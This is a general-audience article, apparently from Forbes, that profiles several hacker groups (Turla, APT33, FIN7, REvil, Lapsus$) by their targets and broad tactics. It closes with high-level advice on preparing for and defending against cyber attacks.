  • Turla is a Russian state-sponsored group known for stealing sensitive information from governments and businesses. The group has been active since at least 2007, and focuses on government and diplomatic organizations. Turla uses tactics like watering hole attacks, spear-phishing, and custom malware to infiltrate its targets. 
  • APT33, also referred to as Elfin or Holmium, is an Iranian-linked group that has been active since 2013. The group targets aerospace and energy companies, as well as government organizations, and employs tactics like spear-phishing and custom malware. APT33 is also known for using “living-off-the-land” tactics that leverage legitimate tools and software to evade detection. 
  • FIN7, whose activity overlaps with the Carbanak group, is a financially motivated criminal group that has been active since at least 2015. FIN7 targets the retail, restaurant, and hospitality industries with point-of-sale malware and uses advanced social engineering tactics to get its malware onto targets’ systems. The group is believed to have stolen millions of dollars from its victims.
  • REvil, also known as Sodinokibi, is an infamous ransomware-as-a-service group that first appeared in 2019. The group encrypts victims’ data, demands large sums of money for the decryption key, and threatens to publish stolen data if the ransom is not paid. REvil made headlines in 2020 and 2021 with large-scale attacks on companies and government organizations.
  • Lapsus$ is a loosely organized extortion group known for stealing source code and other internal data and then publicizing the theft. Rather than relying on sophisticated malware, it has recruited insiders at target companies (openly offering to pay employees for credentials or access), abused stolen credentials and multi-factor authentication prompts, and coordinated and announced its attacks over the messaging platform Telegram, which allowed it to breach several high-profile targets.

Be Aware and Prepare 

The threats posed by hacker groups are growing more severe and sophisticated. These groups are often highly skilled and well-funded, and they use advanced tactics that can cause serious damage to organizations and individuals. It is important for organizations to be aware of the myriad risks and take appropriate measures to protect themselves. By staying informed and taking proactive, comprehensive steps to secure IT infrastructure, networks, data, applications, and endpoints, organizations can better defend against cyber threats. They should also be prepared to recover in a timely manner should an attack succeed, and should maintain a program for monitoring suspicious internal and external activity so that they can respond quickly in the event of a breach.

Sun Tzu’s Timeless Advice  

By focusing on specific hacker groups in subsequent posts, we can begin to understand the motivations behind these operations, the methodologies each group uses, the potential business impact on communities at large, and ways to defend against attacks through a comprehensive security approach. The key to success in defending against cyber threats is to be proactive and have an encompassing security program in place. By staying informed, taking appropriate measures to secure networks and data, and preparing for and responding to incidents, organizations can minimize their risk of becoming the victim of a cyber attack. By following Sun Tzu’s timeless advice to “know your enemy,” organizations can better understand hacker groups – and thus better defend against them.

This article was originally published in Forbes. Please follow me on LinkedIn.